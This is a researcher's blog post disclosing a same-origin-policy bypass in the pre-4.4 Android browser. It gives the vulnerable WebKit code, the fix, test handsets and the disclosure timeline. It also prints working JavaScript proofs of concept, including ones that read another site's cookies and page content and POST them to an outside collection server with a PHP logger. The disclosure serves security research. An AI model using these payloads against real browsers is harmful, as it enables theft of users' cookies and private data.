A Tale Of Another SOP Bypass In Android Browser < 4.4

<div dir="ltr" style="text-align: left;" trbidi="on"><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiUcYKGYlOma04C1BZBUtj-SVqSR6VyN6x_WsVD17WzSLPXolu9kXmGbDBUxEbjjiZLMfsmjqe72O9S5FQ6oooITeCJO9rwp__FWWo3um31mIy7dQ-qVdWEIwfJdROFWAnM8vcPkdRpBeg/s1600/Pirate.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiUcYKGYlOma04C1BZBUtj-SVqSR6VyN6x_WsVD17WzSLPXolu9kXmGbDBUxEbjjiZLMfsmjqe72O9S5FQ6oooITeCJO9rwp__FWWo3um31mIy7dQ-qVdWEIwfJdROFWAnM8vcPkdRpBeg/s1600/Pirate.jpg" /></a></div><div dir="ltr" style="text-align: left;" trbidi="on"><br />Since, my recent <a href="http://www.rafayhackingarticles.net/2014/08/android-browser-same-origin-policy.html" rel="nofollow" target="_blank">android SOP bypass [CVE-2014-6041]</a> triggered a lot of eruption among the infosec community, I was motivated to research a bit more upon the android browser, it turns out that things are much worse than I thought, I managed to trigger quite a few interesting vulnerabilities inside of Android browser, one of them being another Same Origin Policy Bypass vulnerability. The thing that makes it worse was the same SOP bypass was already <a href="http://trac.webkit.org/changeset/96826" rel="nofollow" target="_blank">fixed</a> inside of chrome years ago, however the patches were not applied to Android browser < 4.4.<br /><a name='more'></a><br /><h4>Proof Of Concept</h4>The following is the proof of concept:<br /><br /><script><br />window.onload = function()<br />{<br />    object = document.createElement("object"); <br />    object.setAttribute("data", "http://www.bing.com");<br />    document.body.appendChild(object);<br />    object.onload = function() {<br />      object.setAttribute("data", "javascript:alert(document.domain)");<br />        object.innerHTML = "foobar";<br />    }<br />}<br /><div></script></div><div><br /></div><div><br />The POC is very easy to understand for individuals having some javaScript background. However, for others let me break it down for you. The above code creates an object with data attribute, which loads up a URL from another origin in this case "<b>http://www.bing.com</b>", however once it's loaded, we replace bing.com with "javascript:alert(document.domain)". The interesting thing here is that the last line is essential for the POC to work <b>object.innerHTML = "foobar"; </b>so that the navigation request is performed<br /><br />Let's take a look at the vulnerable code that is responsible for the causing the issue:<br /><h4>Vulnerable Code</h4>bool HTMLPlugInImageElement::allowedToLoadFrameURL(const String& url)<br />{<br />    ASSERT(document());<br />    ASSERT(document()->frame());<br />    if (document()->frame()->page()->frameCount() >= Page::maxNumberOfFrames)<br />        return false;<br />    <b><u><span style="color: red;">KURL completeURL = document()->completeURL(url);</span></u></b><br /><br /><br />The above function is responsible for loading up the frame URL, if you take a close look at the code, you would find out that there is no validation for javascript scheme, which allows us to execute javaScript in context of the frame that was loaded.<br /><h4>The fix</h4>The issue was <a href="https://android.googlesource.com/platform/external/webkit/+/109d59bf6fe4abfd001fc60ddd403f1046b117ef%5E%21/#F0" rel="nofollow" target="_blank">fixed </a>by applying the following checks from <b>securityorigin.h</b> library. <br /><br />  if (contentFrame() &&<span style="color: red;"> protocolIsJavaScript(completeURL)</span><br />       && !document()->securityOrigin()->canAccess(contentDocument()->securityOrigin()))<br />       return false;<br /><h4>Proof Of Concept Using Postmessage Call</h4>To help understand the vulnerability better and get to the root cause, i contacted Joe Vennix from metasploit team, who modified my original POC to the following to help demonstrate the vulnerability in an effective manner. The following POC uses postMessage call from HTML 5 world to send the document.cookie and innerHTML to the main window.<br /><br /><script><br />window.onload = function()<br />{<br />    object = document.createElement("object");<br />    object.setAttribute("data", "http://www.bing.com");<br />    document.body.appendChild(object);<br />    object.onload = function() {<br />        object.data = "javascript:var t=top;with(document)t.postMessage('HTML='+body.innerHTML+'&COOKIE='+cookie,'*');";<br />        object.innerHTML = "foobar";<br />    }<br />}<br /><br />window.onmessage = function(m){<br />  alert(m.data);<br />}<br /></script><br /><br /><h4>Proof Of Concept To Steal Data Across Domains</h4>A great friend of mine @filedescriptor helped me with the following POC, which steals data from bing.com by accessing the document.body.innerHTML property as submits that data cross origin by using a POST request, since you can send limited amount of data with GET due to browser restrictions.<br /><br /><script><br />window.onload = function()<br />{<br />object = document.createElement("object");<br />object.setAttribute("data", "http://www.bing.com");<br />document.body.appendChild(object);<br />object.onload = function() {<br />object.data = "javascript:with(document)body.innerHTML+='<form method=post action=//kcal.pw/record.php?name=__target=_><input name=content></form><iframe name=_>',__.content.value=body.innerHTML,__.submit()";<br />object.innerHTML = "foobar";<br />}<br />}</div><div><br />The PHP file hosted at record.php contains the following line, which saves the data coming from bing.com to a file called record.txt.<br /><b><br /></b><b>file_put_contents('record.txt', $_POST['content']);</b><br /><br />The following are some of the handsets that we used to test and verify this vulnerability.<br /><h4>Sony Xperia</h4><b><br /></b><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjnaBm9l118beLDbu4Tj7FfiBxPN2jiinVbUkBDiQgP_n_oIEIFi-bgEBL-p1Tu6xqesGxY9vGT9cSAFeOSx8MypADxBk6dsJxlJxj0qjOf7y1JEaNheSH-t61cV3rp2WHW53VHhClIRfs/s1600/SONY.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em; text-align: center;"><img border="0" height="640" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjnaBm9l118beLDbu4Tj7FfiBxPN2jiinVbUkBDiQgP_n_oIEIFi-bgEBL-p1Tu6xqesGxY9vGT9cSAFeOSx8MypADxBk6dsJxlJxj0qjOf7y1JEaNheSH-t61cV3rp2WHW53VHhClIRfs/s1600/SONY.png" width="364" /></a></div><h4>LGNexus4</h4><br /><b><br /></b><br /><div class="separator" style="clear: both; text-align: center;"><br /></div><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjc6wb-S9dxp36s96uLbLvSpGjQlOsHsG3JG-ncxperPU9lBV0ujUFnU4UH1KghjAPxVaojN_rKHPzUwJE6fHFdZsHcRnMwZiOV6HMu3X0J8p6wM27Gdjpu5VIzbj9vKXXQlJtbiZk4yxY/s1600/LGNEXUS.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="640" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjc6wb-S9dxp36s96uLbLvSpGjQlOsHsG3JG-ncxperPU9lBV0ujUFnU4UH1KghjAPxVaojN_rKHPzUwJE6fHFdZsHcRnMwZiOV6HMu3X0J8p6wM27Gdjpu5VIzbj9vKXXQlJtbiZk4yxY/s1600/LGNEXUS.png" width="320" /></a></div><div class="separator" style="clear: both; text-align: center;"><b><br /></b></div><div class="separator" style="clear: both; text-align: left;"></div><h4>Samsung Galaxy S3</h4><div class="separator" style="clear: both; text-align: left;"><b><br /></b></div><div class="separator" style="clear: both; text-align: left;"><b><br /></b></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgDjhf9VNXEHCza6z72HOUoifEaftel85lnYrdGQVwR2JnPThdrC67jrdW5fOMrtpJc03osf0BNq7cZDMCam68Lq0dJBHXGGl4mUnrVrbkkOG2GfasIN7usPNVcapFEKaahSuifO9YbquU/s1600/samsung+galaxy+s3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="640" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgDjhf9VNXEHCza6z72HOUoifEaftel85lnYrdGQVwR2JnPThdrC67jrdW5fOMrtpJc03osf0BNq7cZDMCam68Lq0dJBHXGGl4mUnrVrbkkOG2GfasIN7usPNVcapFEKaahSuifO9YbquU/s1600/samsung+galaxy+s3.png" width="322" /></a></div><div class="separator" style="clear: both; text-align: left;"><b><br /></b></div><div class="separator" style="clear: both; text-align: left;"><b><br /></b></div><div class="separator" style="clear: both; text-align: left;"></div><h4>Safari Browser 5.0</h4><div class="separator" style="clear: both; text-align: left;"><b><br /></b></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi2I-1IyGVOYerr4IS6uRwLRFAPhSRNFvQM95a3DuSWgdRD4KLMwI7Qa4lhaJfPqhT1ygpwU3xjyN9crOAQLlnuLzR-3e4ZanvXPW5-81-ccW9vVWRcyayYFG5_1-VW80nveE633Y7lEOI/s1600/safari+5.0.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="348" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi2I-1IyGVOYerr4IS6uRwLRFAPhSRNFvQM95a3DuSWgdRD4KLMwI7Qa4lhaJfPqhT1ygpwU3xjyN9crOAQLlnuLzR-3e4ZanvXPW5-81-ccW9vVWRcyayYFG5_1-VW80nveE633Y7lEOI/s1600/safari+5.0.png" width="400" /></a></div><div class="separator" style="clear: both; text-align: left;"><br /></div><h4>Google's Response</h4>The vulnerability was responsibly disclosed to Google on 9/25/2014, The vulnerability was fixed on 10/1/2014 and the patches have been released <a href="https://android.googlesource.com/platform/external/webkit/+/109d59bf6fe4abfd001fc60ddd403f1046b117ef" rel="nofollow" target="_blank">here</a>.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjBC7rknn28IrSjKzlmK4C2-gEEdRF_wnWZUYbCbLRXaSPemZQb6l3cxbUSgW9Xn56EK-1crnHIEyLC97qo4qeSp1d5NBN0OzLqLVKuXzUNNvvoI35U0-ivktGfE1j0Hqj_oNYnZIFm_XU/s1600/jb.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="137" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjBC7rknn28IrSjKzlmK4C2-gEEdRF_wnWZUYbCbLRXaSPemZQb6l3cxbUSgW9Xn56EK-1crnHIEyLC97qo4qeSp1d5NBN0OzLqLVKuXzUNNvvoI35U0-ivktGfE1j0Hqj_oNYnZIFm_XU/s1600/jb.png" width="577" /></a></div></div></div><h4>In Closing</h4><div>There are tons of other browsers with huge userbase that are vulnerable to same vulnerability, Maxthon, CM Browser, Safari Browser 5.0 to name a few. In case if you are still using Android browser or any of other browser, you should immediately apply patches or switch to Chrome or firefox. I believe there are several other vulnerabilities that were addresses in chrome webkit and still have not been addressed inside of Android browser, therefore it is recommended to avoid it completely.<br /><br /><b><br /></b><b>Press Coverage</b><br /><br />http://news.yahoo.com/half-android-phones-still-vulnerable-massive-privacy-bug-135551464.html<br /><br />http://www.redmondpie.com/massive-privacy-bug-affects-many-android-devices-heres-how-to-protect-yourself/<br /><br />http://threatpost.com/second-same-origin-policy-bypass-flaw-haunts-android-browser<br /><br />http://www.securityweek.com/google-patches-second-same-origin-policy-bypass-flaw-android-browser<br /><br />http://www.pcworld.com/article/2823012/almost-half-of-android-devices-still-have-a-vulnerable-browser-installed.html<br /><br />http://www.csoonline.com/article/2690910/application-security/android-browser-flaw-found-to-leak-data.html<br /><br />http://tribune.com.pk/story/771546/on-a-roll-another-bug-exposed-by-pakistani-researcher/<br /><br />https://blog.lookout.com/blog/2014/10/06/aosp-browser-vuln/<br /><br />http://www.net-security.org/secworld.php?id=17459<br /><br />http://www.zdnet.com/half-of-all-android-devices-still-vulnerable-to-privacy-disaster-browser-bug-7000034500/<br /><br />http://www.cio.com.au/article/556967/almost-half-android-devices-still-vulnerable-browser-installed/?fp=16&fpid=1<br /><br />http://www.computerworld.com/article/2822813/45-of-android-devices-still-have-a-vulnerable-browser-installed.html#tk.rss_all<br /><br />http://tribune.com.pk/story/776018/bugged-half-of-android-users-vulnerable-to-privacy-disaster/<br /><br />http://checkmarx.com/2014/10/21/pakistani-ethical-hacker/</div></div>

A Tale Of Another SOP Bypass In Android Browser < 4.4

Since, my recent android SOP bypass [CVE-2014-6041]  triggered a lot of eruption among the infosec community, I was motivated to research a ...

+ Read more »